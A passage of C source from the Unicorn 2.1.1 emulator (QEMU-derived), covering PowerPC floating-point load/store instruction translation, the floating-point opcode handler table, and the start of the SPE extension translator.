*/ if (unlikely(ctx->le_mode)) { gen_qemu_ld64_i64(ctx, t0, EA); set_fpr(tcg_ctx, rD(ctx->opcode) + 1, t0); tcg_gen_addi_tl(tcg_ctx, EA, EA, 8); gen_qemu_ld64_i64(ctx, t0, EA); set_fpr(tcg_ctx, rD(ctx->opcode), t0); } else { gen_qemu_ld64_i64(ctx, t0, EA); set_fpr(tcg_ctx, rD(ctx->opcode), t0); tcg_gen_addi_tl(tcg_ctx, EA, EA, 8); gen_qemu_ld64_i64(ctx, t0, EA); set_fpr(tcg_ctx, rD(ctx->opcode) + 1, t0); } tcg_temp_free(tcg_ctx, EA); tcg_temp_free_i64(tcg_ctx, t0); } /* lfiwax */ static void gen_lfiwax(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv EA; TCGv t0; TCGv_i64 t1; if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } gen_set_access_type(ctx, ACCESS_FLOAT); EA = tcg_temp_new(tcg_ctx); t0 = tcg_temp_new(tcg_ctx); t1 = tcg_temp_new_i64(tcg_ctx); gen_addr_reg_index(ctx, EA); gen_qemu_ld32s(ctx, t0, EA); tcg_gen_ext_tl_i64(tcg_ctx, t1, t0); set_fpr(tcg_ctx, rD(ctx->opcode), t1); tcg_temp_free(tcg_ctx, EA); tcg_temp_free(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); } /* lfiwzx */ static void gen_lfiwzx(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv EA; TCGv_i64 t0; if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } gen_set_access_type(ctx, ACCESS_FLOAT); EA = tcg_temp_new(tcg_ctx); t0 = tcg_temp_new_i64(tcg_ctx); gen_addr_reg_index(ctx, EA); gen_qemu_ld32u_i64(ctx, t0, EA); set_fpr(tcg_ctx, rD(ctx->opcode), t0); tcg_temp_free(tcg_ctx, EA); tcg_temp_free_i64(tcg_ctx, t0); } /*** Floating-point store ***/ #define GEN_STF(name, stop, opc, type) \ static void glue(gen_, name)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv EA; \ TCGv_i64 t0; \ if (unlikely(!ctx->fpu_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_FPU); \ return; \ } \ gen_set_access_type(ctx, ACCESS_FLOAT); \ EA = tcg_temp_new(tcg_ctx); \ t0 = tcg_temp_new_i64(tcg_ctx); \ gen_addr_imm_index(ctx, EA, 0); \ get_fpr(tcg_ctx, t0, rS(ctx->opcode)); \ gen_qemu_##stop(ctx, t0, EA); \ tcg_temp_free(tcg_ctx, EA); \ tcg_temp_free_i64(tcg_ctx, t0); \ } #define GEN_STUF(name, stop, opc, type) \ static void glue(gen_, name##u)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv EA; \ TCGv_i64 t0; \ if (unlikely(!ctx->fpu_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_FPU); \ return; \ } \ if (unlikely(rA(ctx->opcode) == 0)) { \ gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL); \ return; \ } \ gen_set_access_type(ctx, ACCESS_FLOAT); \ EA = tcg_temp_new(tcg_ctx); \ t0 = tcg_temp_new_i64(tcg_ctx); \ gen_addr_imm_index(ctx, EA, 0); \ get_fpr(tcg_ctx, t0, rS(ctx->opcode)); \ gen_qemu_##stop(ctx, t0, EA); \ tcg_gen_mov_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], EA); \ tcg_temp_free(tcg_ctx, EA); \ tcg_temp_free_i64(tcg_ctx, t0); \ } #define GEN_STUXF(name, stop, opc, type) \ static void glue(gen_, name##ux)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv EA; \ TCGv_i64 t0; \ if (unlikely(!ctx->fpu_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_FPU); \ return; \ } \ if (unlikely(rA(ctx->opcode) == 0)) { \ gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL); \ return; \ } \ gen_set_access_type(ctx, ACCESS_FLOAT); \ EA = tcg_temp_new(tcg_ctx); \ t0 = tcg_temp_new_i64(tcg_ctx); \ gen_addr_reg_index(ctx, EA); \ get_fpr(tcg_ctx, t0, rS(ctx->opcode)); \ gen_qemu_##stop(ctx, t0, EA); \ tcg_gen_mov_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], EA); \ tcg_temp_free(tcg_ctx, EA); \ tcg_temp_free_i64(tcg_ctx, t0); \ } #define GEN_STXF(name, stop, opc2, opc3, type) \ static void glue(gen_, 
name##x)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv EA; \ TCGv_i64 t0; \ if (unlikely(!ctx->fpu_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_FPU); \ return; \ } \ gen_set_access_type(ctx, ACCESS_FLOAT); \ EA = tcg_temp_new(tcg_ctx); \ t0 = tcg_temp_new_i64(tcg_ctx); \ gen_addr_reg_index(ctx, EA); \ get_fpr(tcg_ctx, t0, rS(ctx->opcode)); \ gen_qemu_##stop(ctx, t0, EA); \ tcg_temp_free(tcg_ctx, EA); \ tcg_temp_free_i64(tcg_ctx, t0); \ } #define GEN_STFS(name, stop, op, type) \ GEN_STF(name, stop, op | 0x20, type); \ GEN_STUF(name, stop, op | 0x21, type); \ GEN_STUXF(name, stop, op | 0x01, type); \ GEN_STXF(name, stop, 0x17, op | 0x00, type) static void gen_qemu_st32fs(DisasContext *ctx, TCGv_i64 src, TCGv addr) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); gen_helper_tosingle(tcg_ctx, tmp, src); tcg_gen_qemu_st_i32(tcg_ctx, tmp, addr, ctx->mem_idx, DEF_MEMOP(MO_UL)); tcg_temp_free_i32(tcg_ctx, tmp); } /* stfd stfdu stfdux stfdx */ GEN_STFS(stfd, st64_i64, 0x16, PPC_FLOAT); /* stfs stfsu stfsux stfsx */ GEN_STFS(stfs, st32fs, 0x14, PPC_FLOAT); /* stfdepx (external PID stfdx) */ static void gen_stfdepx(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv EA; TCGv_i64 t0; CHK_SV; if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } gen_set_access_type(ctx, ACCESS_FLOAT); EA = tcg_temp_new(tcg_ctx); t0 = tcg_temp_new_i64(tcg_ctx); gen_addr_reg_index(ctx, EA); get_fpr(tcg_ctx, t0, rD(ctx->opcode)); tcg_gen_qemu_st_i64(tcg_ctx, t0, EA, PPC_TLB_EPID_STORE, DEF_MEMOP(MO_Q)); tcg_temp_free(tcg_ctx, EA); tcg_temp_free_i64(tcg_ctx, t0); } /* stfdp */ static void gen_stfdp(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv EA; TCGv_i64 t0; if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } gen_set_access_type(ctx, ACCESS_FLOAT); EA = tcg_temp_new(tcg_ctx); t0 = tcg_temp_new_i64(tcg_ctx); gen_addr_imm_index(ctx, EA, 0); /* * We only need to swap high and low halves. gen_qemu_st64_i64 * does necessary 64-bit byteswap already. */ if (unlikely(ctx->le_mode)) { get_fpr(tcg_ctx, t0, rD(ctx->opcode) + 1); gen_qemu_st64_i64(ctx, t0, EA); tcg_gen_addi_tl(tcg_ctx, EA, EA, 8); get_fpr(tcg_ctx, t0, rD(ctx->opcode)); gen_qemu_st64_i64(ctx, t0, EA); } else { get_fpr(tcg_ctx, t0, rD(ctx->opcode)); gen_qemu_st64_i64(ctx, t0, EA); tcg_gen_addi_tl(tcg_ctx, EA, EA, 8); get_fpr(tcg_ctx, t0, rD(ctx->opcode) + 1); gen_qemu_st64_i64(ctx, t0, EA); } tcg_temp_free(tcg_ctx, EA); tcg_temp_free_i64(tcg_ctx, t0); } /* stfdpx */ static void gen_stfdpx(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv EA; TCGv_i64 t0; if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } gen_set_access_type(ctx, ACCESS_FLOAT); EA = tcg_temp_new(tcg_ctx); t0 = tcg_temp_new_i64(tcg_ctx); gen_addr_reg_index(ctx, EA); /* * We only need to swap high and low halves. gen_qemu_st64_i64 * does necessary 64-bit byteswap already. 
*/ if (unlikely(ctx->le_mode)) { get_fpr(tcg_ctx, t0, rD(ctx->opcode) + 1); gen_qemu_st64_i64(ctx, t0, EA); tcg_gen_addi_tl(tcg_ctx, EA, EA, 8); get_fpr(tcg_ctx, t0, rD(ctx->opcode)); gen_qemu_st64_i64(ctx, t0, EA); } else { get_fpr(tcg_ctx, t0, rD(ctx->opcode)); gen_qemu_st64_i64(ctx, t0, EA); tcg_gen_addi_tl(tcg_ctx, EA, EA, 8); get_fpr(tcg_ctx, t0, rD(ctx->opcode) + 1); gen_qemu_st64_i64(ctx, t0, EA); } tcg_temp_free(tcg_ctx, EA); tcg_temp_free_i64(tcg_ctx, t0); } /* Optional: */ static inline void gen_qemu_st32fiw(DisasContext *ctx, TCGv_i64 arg1, TCGv arg2) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); tcg_gen_trunc_i64_tl(tcg_ctx, t0, arg1); gen_qemu_st32(ctx, t0, arg2); tcg_temp_free(tcg_ctx, t0); } /* stfiwx */ GEN_STXF(stfiw, st32fiw, 0x17, 0x1E, PPC_FLOAT_STFIWX); /* POWER2 specific instructions */ /* Quad manipulation (load/store two floats at a time) */ /* lfq */ static void gen_lfq(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int rd = rD(ctx->opcode); TCGv t0; TCGv_i64 t1; gen_set_access_type(ctx, ACCESS_FLOAT); t0 = tcg_temp_new(tcg_ctx); t1 = tcg_temp_new_i64(tcg_ctx); gen_addr_imm_index(ctx, t0, 0); gen_qemu_ld64_i64(ctx, t1, t0); set_fpr(tcg_ctx, rd, t1); gen_addr_add(ctx, t0, t0, 8); gen_qemu_ld64_i64(ctx, t1, t0); set_fpr(tcg_ctx, (rd + 1) % 32, t1); tcg_temp_free(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); } /* lfqu */ static void gen_lfqu(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int ra = rA(ctx->opcode); int rd = rD(ctx->opcode); TCGv t0, t1; TCGv_i64 t2; gen_set_access_type(ctx, ACCESS_FLOAT); t0 = tcg_temp_new(tcg_ctx); t1 = tcg_temp_new(tcg_ctx); t2 = tcg_temp_new_i64(tcg_ctx); gen_addr_imm_index(ctx, t0, 0); gen_qemu_ld64_i64(ctx, t2, t0); set_fpr(tcg_ctx, rd, t2); gen_addr_add(ctx, t1, t0, 8); gen_qemu_ld64_i64(ctx, t2, t1); set_fpr(tcg_ctx, (rd + 1) % 32, t2); if (ra != 0) { tcg_gen_mov_tl(tcg_ctx, cpu_gpr[ra], t0); } tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t2); } /* lfqux */ static void gen_lfqux(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int ra = rA(ctx->opcode); int rd = rD(ctx->opcode); gen_set_access_type(ctx, ACCESS_FLOAT); TCGv t0, t1; TCGv_i64 t2; t2 = tcg_temp_new_i64(tcg_ctx); t0 = tcg_temp_new(tcg_ctx); gen_addr_reg_index(ctx, t0); gen_qemu_ld64_i64(ctx, t2, t0); set_fpr(tcg_ctx, rd, t2); t1 = tcg_temp_new(tcg_ctx); gen_addr_add(ctx, t1, t0, 8); gen_qemu_ld64_i64(ctx, t2, t1); set_fpr(tcg_ctx, (rd + 1) % 32, t2); tcg_temp_free(tcg_ctx, t1); if (ra != 0) { tcg_gen_mov_tl(tcg_ctx, cpu_gpr[ra], t0); } tcg_temp_free(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t2); } /* lfqx */ static void gen_lfqx(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int rd = rD(ctx->opcode); TCGv t0; TCGv_i64 t1; gen_set_access_type(ctx, ACCESS_FLOAT); t0 = tcg_temp_new(tcg_ctx); t1 = tcg_temp_new_i64(tcg_ctx); gen_addr_reg_index(ctx, t0); gen_qemu_ld64_i64(ctx, t1, t0); set_fpr(tcg_ctx, rd, t1); gen_addr_add(ctx, t0, t0, 8); gen_qemu_ld64_i64(ctx, t1, t0); set_fpr(tcg_ctx, (rd + 1) % 32, t1); tcg_temp_free(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); } /* stfq */ static void gen_stfq(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int rd = rD(ctx->opcode); TCGv t0; TCGv_i64 t1; gen_set_access_type(ctx, ACCESS_FLOAT); t0 = tcg_temp_new(tcg_ctx); t1 = tcg_temp_new_i64(tcg_ctx); gen_addr_imm_index(ctx, t0, 0); get_fpr(tcg_ctx, t1, rd); gen_qemu_st64_i64(ctx, t1, t0); gen_addr_add(ctx, t0, t0, 8); get_fpr(tcg_ctx, t1, (rd + 1) % 
32); gen_qemu_st64_i64(ctx, t1, t0); tcg_temp_free(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); } /* stfqu */ static void gen_stfqu(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int ra = rA(ctx->opcode); int rd = rD(ctx->opcode); TCGv t0, t1; TCGv_i64 t2; gen_set_access_type(ctx, ACCESS_FLOAT); t2 = tcg_temp_new_i64(tcg_ctx); t0 = tcg_temp_new(tcg_ctx); gen_addr_imm_index(ctx, t0, 0); get_fpr(tcg_ctx, t2, rd); gen_qemu_st64_i64(ctx, t2, t0); t1 = tcg_temp_new(tcg_ctx); gen_addr_add(ctx, t1, t0, 8); get_fpr(tcg_ctx, t2, (rd + 1) % 32); gen_qemu_st64_i64(ctx, t2, t1); tcg_temp_free(tcg_ctx, t1); if (ra != 0) { tcg_gen_mov_tl(tcg_ctx, cpu_gpr[ra], t0); } tcg_temp_free(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t2); } /* stfqux */ static void gen_stfqux(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int ra = rA(ctx->opcode); int rd = rD(ctx->opcode); TCGv t0, t1; TCGv_i64 t2; gen_set_access_type(ctx, ACCESS_FLOAT); t2 = tcg_temp_new_i64(tcg_ctx); t0 = tcg_temp_new(tcg_ctx); gen_addr_reg_index(ctx, t0); get_fpr(tcg_ctx, t2, rd); gen_qemu_st64_i64(ctx, t2, t0); t1 = tcg_temp_new(tcg_ctx); gen_addr_add(ctx, t1, t0, 8); get_fpr(tcg_ctx, t2, (rd + 1) % 32); gen_qemu_st64_i64(ctx, t2, t1); tcg_temp_free(tcg_ctx, t1); if (ra != 0) { tcg_gen_mov_tl(tcg_ctx, cpu_gpr[ra], t0); } tcg_temp_free(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t2); } /* stfqx */ static void gen_stfqx(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int rd = rD(ctx->opcode); TCGv t0; TCGv_i64 t1; gen_set_access_type(ctx, ACCESS_FLOAT); t1 = tcg_temp_new_i64(tcg_ctx); t0 = tcg_temp_new(tcg_ctx); gen_addr_reg_index(ctx, t0); get_fpr(tcg_ctx, t1, rd); gen_qemu_st64_i64(ctx, t1, t0); gen_addr_add(ctx, t0, t0, 8); get_fpr(tcg_ctx, t1, (rd + 1) % 32); gen_qemu_st64_i64(ctx, t1, t0); tcg_temp_free(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); } #undef _GEN_FLOAT_ACB #undef GEN_FLOAT_ACB #undef _GEN_FLOAT_AB #undef GEN_FLOAT_AB #undef _GEN_FLOAT_AC #undef GEN_FLOAT_AC #undef GEN_FLOAT_B #undef GEN_FLOAT_BS #undef GEN_LDF #undef GEN_LDUF #undef GEN_LDUXF #undef GEN_LDXF #undef GEN_LDFS #undef GEN_STF #undef GEN_STUF #undef GEN_STUXF #undef GEN_STXF #undef GEN_STFS
unicorn-2.1.1/qemu/target/ppc/translate/fp-ops.inc.c
#define _GEN_FLOAT_ACB(name, op, op1, op2, isfloat, set_fprf, type) \ GEN_HANDLER(f##name, op1, op2, 0xFF, 0x00000000, type) #define GEN_FLOAT_ACB(name, op2, set_fprf, type) \ _GEN_FLOAT_ACB(name, name, 0x3F, op2, 0, set_fprf, type), \ _GEN_FLOAT_ACB(name##s, name, 0x3B, op2, 1, set_fprf, type) #define _GEN_FLOAT_AB(name, op, op1, op2, inval, isfloat, set_fprf, type) \ GEN_HANDLER(f##name, op1, op2, 0xFF, inval, type) #define GEN_FLOAT_AB(name, op2, inval, set_fprf, type) \ _GEN_FLOAT_AB(name, name, 0x3F, op2, inval, 0, set_fprf, type), \ _GEN_FLOAT_AB(name##s, name, 0x3B, op2, inval, 1, set_fprf, type) #define _GEN_FLOAT_AC(name, op, op1, op2, inval, isfloat, set_fprf, type) \ GEN_HANDLER(f##name, op1, op2, 0xFF, inval, type) #define GEN_FLOAT_AC(name, op2, inval, set_fprf, type) \ _GEN_FLOAT_AC(name, name, 0x3F, op2, inval, 
0, set_fprf, type), \ _GEN_FLOAT_AC(name##s, name, 0x3B, op2, inval, 1, set_fprf, type) #define GEN_FLOAT_B(name, op2, op3, set_fprf, type) \ GEN_HANDLER(f##name, 0x3F, op2, op3, 0x001F0000, type) #define GEN_FLOAT_BS(name, op1, op2, set_fprf, type) \ GEN_HANDLER(f##name, op1, op2, 0xFF, 0x001F07C0, type) GEN_FLOAT_AB(add, 0x15, 0x000007C0, 1, PPC_FLOAT), GEN_FLOAT_AB(div, 0x12, 0x000007C0, 1, PPC_FLOAT), GEN_FLOAT_AC(mul, 0x19, 0x0000F800, 1, PPC_FLOAT), GEN_FLOAT_BS(re, 0x3F, 0x18, 1, PPC_FLOAT_EXT), GEN_FLOAT_BS(res, 0x3B, 0x18, 1, PPC_FLOAT_FRES), GEN_FLOAT_BS(rsqrte, 0x3F, 0x1A, 1, PPC_FLOAT_FRSQRTE), _GEN_FLOAT_ACB(sel, sel, 0x3F, 0x17, 0, 0, PPC_FLOAT_FSEL), GEN_FLOAT_AB(sub, 0x14, 0x000007C0, 1, PPC_FLOAT), GEN_FLOAT_ACB(madd, 0x1D, 1, PPC_FLOAT), GEN_FLOAT_ACB(msub, 0x1C, 1, PPC_FLOAT), GEN_FLOAT_ACB(nmadd, 0x1F, 1, PPC_FLOAT), GEN_FLOAT_ACB(nmsub, 0x1E, 1, PPC_FLOAT), GEN_HANDLER_E(ftdiv, 0x3F, 0x00, 0x04, 1, PPC_NONE, PPC2_FP_TST_ISA206), GEN_HANDLER_E(ftsqrt, 0x3F, 0x00, 0x05, 1, PPC_NONE, PPC2_FP_TST_ISA206), GEN_FLOAT_B(ctiw, 0x0E, 0x00, 0, PPC_FLOAT), GEN_HANDLER_E(fctiwu, 0x3F, 0x0E, 0x04, 0, PPC_NONE, PPC2_FP_CVT_ISA206), GEN_FLOAT_B(ctiwz, 0x0F, 0x00, 0, PPC_FLOAT), GEN_HANDLER_E(fctiwuz, 0x3F, 0x0F, 0x04, 0, PPC_NONE, PPC2_FP_CVT_ISA206), GEN_FLOAT_B(rsp, 0x0C, 0x00, 1, PPC_FLOAT), GEN_HANDLER_E(fcfid, 0x3F, 0x0E, 0x1A, 0x001F0000, PPC_NONE, PPC2_FP_CVT_S64), GEN_HANDLER_E(fcfids, 0x3B, 0x0E, 0x1A, 0, PPC_NONE, PPC2_FP_CVT_ISA206), GEN_HANDLER_E(fcfidu, 0x3F, 0x0E, 0x1E, 0, PPC_NONE, PPC2_FP_CVT_ISA206), GEN_HANDLER_E(fcfidus, 0x3B, 0x0E, 0x1E, 0, PPC_NONE, PPC2_FP_CVT_ISA206), GEN_HANDLER_E(fctid, 0x3F, 0x0E, 0x19, 0x001F0000, PPC_NONE, PPC2_FP_CVT_S64), GEN_HANDLER_E(fctidu, 0x3F, 0x0E, 0x1D, 0, PPC_NONE, PPC2_FP_CVT_ISA206), GEN_HANDLER_E(fctidz, 0x3F, 0x0F, 0x19, 0x001F0000, PPC_NONE, PPC2_FP_CVT_S64), GEN_HANDLER_E(fctiduz, 0x3F, 0x0F, 0x1D, 0, PPC_NONE, PPC2_FP_CVT_ISA206), GEN_FLOAT_B(rin, 0x08, 0x0C, 1, PPC_FLOAT_EXT), GEN_FLOAT_B(riz, 0x08, 0x0D, 1, PPC_FLOAT_EXT), GEN_FLOAT_B(rip, 0x08, 0x0E, 1, PPC_FLOAT_EXT), GEN_FLOAT_B(rim, 0x08, 0x0F, 1, PPC_FLOAT_EXT), #define GEN_LDF(name, ldop, opc, type) \ GEN_HANDLER(name, opc, 0xFF, 0xFF, 0x00000000, type), #define GEN_LDUF(name, ldop, opc, type) \ GEN_HANDLER(name##u, opc, 0xFF, 0xFF, 0x00000000, type), #define GEN_LDUXF(name, ldop, opc, type) \ GEN_HANDLER(name##ux, 0x1F, 0x17, opc, 0x00000001, type), #define GEN_LDXF(name, ldop, opc2, opc3, type) \ GEN_HANDLER(name##x, 0x1F, opc2, opc3, 0x00000001, type), #define GEN_LDFS(name, ldop, op, type) \ GEN_LDF(name, ldop, op | 0x20, type) \ GEN_LDUF(name, ldop, op | 0x21, type) \ GEN_LDUXF(name, ldop, op | 0x01, type) \ GEN_LDXF(name, ldop, 0x17, op | 0x00, type) GEN_LDFS(lfd, ld64, 0x12, PPC_FLOAT) GEN_LDFS(lfs, ld32fs, 0x10, PPC_FLOAT) GEN_HANDLER_E(lfdepx, 0x1F, 0x1F, 0x12, 0x00000001, PPC_NONE, PPC2_BOOKE206), GEN_HANDLER_E(lfiwax, 0x1f, 0x17, 0x1a, 0x00000001, PPC_NONE, PPC2_ISA205), GEN_HANDLER_E(lfiwzx, 0x1f, 0x17, 0x1b, 0x1, PPC_NONE, PPC2_FP_CVT_ISA206), GEN_HANDLER_E(lfdpx, 0x1F, 0x17, 0x18, 0x00200001, PPC_NONE, PPC2_ISA205), #define GEN_STF(name, stop, opc, type) \ GEN_HANDLER(name, opc, 0xFF, 0xFF, 0x00000000, type), #define GEN_STUF(name, stop, opc, type) \ GEN_HANDLER(name##u, opc, 0xFF, 0xFF, 0x00000000, type), #define GEN_STUXF(name, stop, opc, type) \ GEN_HANDLER(name##ux, 0x1F, 0x17, opc, 0x00000001, type), #define GEN_STXF(name, stop, opc2, opc3, type) \ GEN_HANDLER(name##x, 0x1F, opc2, opc3, 0x00000001, type), #define GEN_STFS(name, stop, op, type) \ 
GEN_STF(name, stop, op | 0x20, type) \ GEN_STUF(name, stop, op | 0x21, type) \ GEN_STUXF(name, stop, op | 0x01, type) \ GEN_STXF(name, stop, 0x17, op | 0x00, type) GEN_STFS(stfd, st64_i64, 0x16, PPC_FLOAT) GEN_STFS(stfs, st32fs, 0x14, PPC_FLOAT) GEN_STXF(stfiw, st32fiw, 0x17, 0x1E, PPC_FLOAT_STFIWX) GEN_HANDLER_E(stfdepx, 0x1F, 0x1F, 0x16, 0x00000001, PPC_NONE, PPC2_BOOKE206), GEN_HANDLER_E(stfdpx, 0x1F, 0x17, 0x1C, 0x00200001, PPC_NONE, PPC2_ISA205), GEN_HANDLER(frsqrtes, 0x3B, 0x1A, 0xFF, 0x001F07C0, PPC_FLOAT_FRSQRTES), GEN_HANDLER(fsqrt, 0x3F, 0x16, 0xFF, 0x001F07C0, PPC_FLOAT_FSQRT), GEN_HANDLER(fsqrts, 0x3B, 0x16, 0xFF, 0x001F07C0, PPC_FLOAT_FSQRT), GEN_HANDLER(fcmpo, 0x3F, 0x00, 0x01, 0x00600001, PPC_FLOAT), GEN_HANDLER(fcmpu, 0x3F, 0x00, 0x00, 0x00600001, PPC_FLOAT), GEN_HANDLER(fabs, 0x3F, 0x08, 0x08, 0x001F0000, PPC_FLOAT), GEN_HANDLER(fmr, 0x3F, 0x08, 0x02, 0x001F0000, PPC_FLOAT), GEN_HANDLER(fnabs, 0x3F, 0x08, 0x04, 0x001F0000, PPC_FLOAT), GEN_HANDLER(fneg, 0x3F, 0x08, 0x01, 0x001F0000, PPC_FLOAT), GEN_HANDLER_E(fcpsgn, 0x3F, 0x08, 0x00, 0x00000000, PPC_NONE, PPC2_ISA205), GEN_HANDLER_E(fmrgew, 0x3F, 0x06, 0x1E, 0x00000001, PPC_NONE, PPC2_VSX207), GEN_HANDLER_E(fmrgow, 0x3F, 0x06, 0x1A, 0x00000001, PPC_NONE, PPC2_VSX207), GEN_HANDLER(mcrfs, 0x3F, 0x00, 0x02, 0x0063F801, PPC_FLOAT), GEN_HANDLER_E_2(mffs, 0x3F, 0x07, 0x12, 0x00, 0x00000000, PPC_FLOAT, PPC_NONE), GEN_HANDLER_E_2(mffsce, 0x3F, 0x07, 0x12, 0x01, 0x00000000, PPC_FLOAT, PPC2_ISA300), GEN_HANDLER_E_2(mffsl, 0x3F, 0x07, 0x12, 0x18, 0x00000000, PPC_FLOAT, PPC2_ISA300), GEN_HANDLER_E_2(mffscrn, 0x3F, 0x07, 0x12, 0x16, 0x00000000, PPC_FLOAT, PPC_NONE), GEN_HANDLER_E_2(mffscrni, 0x3F, 0x07, 0x12, 0x17, 0x00000000, PPC_FLOAT, PPC_NONE), GEN_HANDLER(mtfsb0, 0x3F, 0x06, 0x02, 0x001FF800, PPC_FLOAT), GEN_HANDLER(mtfsb1, 0x3F, 0x06, 0x01, 0x001FF800, PPC_FLOAT), GEN_HANDLER(mtfsf, 0x3F, 0x07, 0x16, 0x00000000, PPC_FLOAT), GEN_HANDLER(mtfsfi, 0x3F, 0x06, 0x04, 0x006e0800, PPC_FLOAT),
unicorn-2.1.1/qemu/target/ppc/translate/spe-impl.inc.c
/* * translate-spe.c * * Freescale SPE extension translation */ /*** SPE extension ***/ /* Register moves */ static inline void gen_evmra(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (unlikely(!ctx->spe_enabled)) { gen_exception(ctx, POWERPC_EXCP_SPEU); return; } TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); /* tmp := rA_lo + rA_hi << 32 */ tcg_gen_concat_tl_i64(tcg_ctx, tmp, cpu_gpr[rA(ctx->opcode)], cpu_gprh[rA(ctx->opcode)]); /* spe_acc := tmp */ tcg_gen_st_i64(tcg_ctx, tmp, tcg_ctx->cpu_env, offsetof(CPUPPCState, spe_acc)); tcg_temp_free_i64(tcg_ctx, 
tmp); /* rD := rA */ tcg_gen_mov_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], cpu_gpr[rA(ctx->opcode)]); tcg_gen_mov_tl(tcg_ctx, cpu_gprh[rD(ctx->opcode)], cpu_gprh[rA(ctx->opcode)]); } static inline void gen_load_gpr64(TCGContext *tcg_ctx, TCGv_i64 t, int reg) { tcg_gen_concat_tl_i64(tcg_ctx, t, cpu_gpr[reg], cpu_gprh[reg]); } static inline void gen_store_gpr64(TCGContext *tcg_ctx, int reg, TCGv_i64 t) { tcg_gen_extr_i64_tl(tcg_ctx, cpu_gpr[reg], cpu_gprh[reg], t); } #define GEN_SPE(name0, name1, opc2, opc3, inval0, inval1, type) \ static void glue(gen_, name0##_##name1)(DisasContext *ctx) \ { \ if (Rc(ctx->opcode)) \ gen_##name1(ctx); \ else \ gen_##name0(ctx); \ } /* Handler for undefined SPE opcodes */ static inline void gen_speundef(DisasContext *ctx) { gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL); } /* SPE logic */ #define GEN_SPEOP_LOGIC2(name, tcg_op) \ static inline void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ if (unlikely(!ctx->spe_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_SPEU); \ return; \ } \ tcg_op(tcg_ctx, cpu_gpr[rD(ctx->opcode)], cpu_gpr[rA(ctx->opcode)], \ cpu_gpr[rB(ctx->opcode)]); \ tcg_op(tcg_ctx, cpu_gprh[rD(ctx->opcode)], cpu_gprh[rA(ctx->opcode)], \ cpu_gprh[rB(ctx->opcode)]); \ } GEN_SPEOP_LOGIC2(evand, tcg_gen_and_tl); GEN_SPEOP_LOGIC2(evandc, tcg_gen_andc_tl); GEN_SPEOP_LOGIC2(evxor, tcg_gen_xor_tl); GEN_SPEOP_LOGIC2(evor, tcg_gen_or_tl); GEN_SPEOP_LOGIC2(evnor, tcg_gen_nor_tl); GEN_SPEOP_LOGIC2(eveqv, tcg_gen_eqv_tl); GEN_SPEOP_LOGIC2(evorc, tcg_gen_orc_tl); GEN_SPEOP_LOGIC2(evnand, tcg_gen_nand_tl); /* SPE logic immediate */ #define GEN_SPEOP_TCG_LOGIC_IMM2(name, tcg_opi) \ static inline void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i32 t0; \ if (unlikely(!ctx->spe_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_SPEU); \ return; \ } \ t0 = tcg_temp_new_i32(tcg_ctx); \ \ tcg_gen_trunc_tl_i32(tcg_ctx, t0, cpu_gpr[rA(ctx->opcode)]); \ tcg_opi(tcg_ctx, t0, t0, 